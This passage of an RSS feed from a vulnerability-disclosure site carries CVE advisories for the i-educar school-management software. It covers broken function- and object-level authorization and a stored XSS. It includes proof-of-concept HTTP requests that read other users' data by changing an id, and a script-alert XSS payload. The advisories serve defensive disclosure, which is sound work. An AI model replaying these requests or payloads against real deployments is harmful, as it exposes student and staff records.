&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;oper&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;post&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;resource&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;grades&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;msgs&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;msg&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Grades successfully posted!&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;type&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;success&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}],&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;any_error_msg&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;false&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Tampering with academic data without authorization.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of data integrity in school records.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential legal and reputational damage for educational institutions.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8790</title>
        <link>https://www.cvehunters.com/p/cve-2025-8790/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8790/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8790-broken-object-level-authorization-bola-in-pessoa-api-endpoint-allows-unauthorized-access-to-other-users-data&amp;#34;&amp;gt;CVE-2025-8790: Broken Object Level Authorization (BOLA) in pessoa API Endpoint Allows Unauthorized Access to Other Users Data
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the i-educar 2.8 and 2.9 API, allowing any authenticated low-privileged user to access sensitive information from other users by manipulating the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter in the &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt; resource endpoint.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint &amp;lt;code&amp;gt;/module/Api/pessoa&amp;lt;/code&amp;gt; lacks proper authorization checks to ensure that the authenticated user is only able to access their own data.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;By altering the id parameter in the following request, any authenticated user can retrieve information about other users:&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/pessoa?&amp;amp;oper=get&amp;amp;resource=pessoa&amp;amp;id=1 HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8790-broken-object-level-authorization-bola-in-pessoa-api-endpoint-allows-unauthorized-access-to-other-users-data&amp;#34;&amp;gt;CVE-2025-8790: Broken Object Level Authorization (BOLA) in pessoa API Endpoint Allows Unauthorized Access to Other Users Data
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the i-educar 2.8 and 2.9 API, allowing any authenticated low-privileged user to access sensitive information from other users by manipulating the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter in the &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt; resource endpoint.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint &amp;lt;code&amp;gt;/module/Api/pessoa&amp;lt;/code&amp;gt; lacks proper authorization checks to ensure that the authenticated user is only able to access their own data.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;By altering the id parameter in the following request, any authenticated user can retrieve information about other users:&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/pessoa?&amp;amp;oper=get&amp;amp;resource=pessoa&amp;amp;id=1 HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;1. Authenticate as a non-privileged user (e.g., student, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image.png&amp;#34;
	width=&amp;#34;1844&amp;#34;
	height=&amp;#34;712&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image_hu_48fc6d25edbda623.png 480w, /p/cve-2025-8790/image_hu_74ee304be9e6fa02.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;258&amp;#34;
		data-flex-basis=&amp;#34;621px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;2. Send the following request targeting id=1 user:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/pessoa?&amp;amp;amp;oper=get&amp;amp;amp;resource=pessoa&amp;amp;amp;id=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=VALID_SESSION_COOKIE }
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image-1.png&amp;#34;
	width=&amp;#34;1692&amp;#34;
	height=&amp;#34;722&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image-1_hu_c84dc371c6bf6535.png 480w, /p/cve-2025-8790/image-1_hu_320efcd74fb43e61.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;3. Observe that user data for id=1 is returned, even if the logged-in user is not authorized to access that profile:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image-2.png&amp;#34;
	width=&amp;#34;340&amp;#34;
	height=&amp;#34;205&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image-2_hu_d9c8057967bbba47.png 480w, /p/cve-2025-8790/image-2_hu_ab2516e3d6f6df9a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;165&amp;#34;
		data-flex-basis=&amp;#34;398px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive PII;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violation of data protection laws (e.g., LGPD, GDPR);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential abuse of user data or impersonation;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;User enumeration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8784</title>
        <link>https://www.cvehunters.com/p/cve-2025-8784/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8784/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8784-cross-site-scripting-xss-stored-endpoint-funcionario_vinculo_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8784: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8784-cross-site-scripting-xss-stored-endpoint-funcionario_vinculo_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8784: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8784/image-1.png&amp;#34;
	width=&amp;#34;816&amp;#34;
	height=&amp;#34;785&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8784/image-1_hu_65d849fc4a441b59.png 480w, /p/cve-2025-8784/image-1_hu_8e8bc4b51d611da8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;103&amp;#34;
		data-flex-basis=&amp;#34;249px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
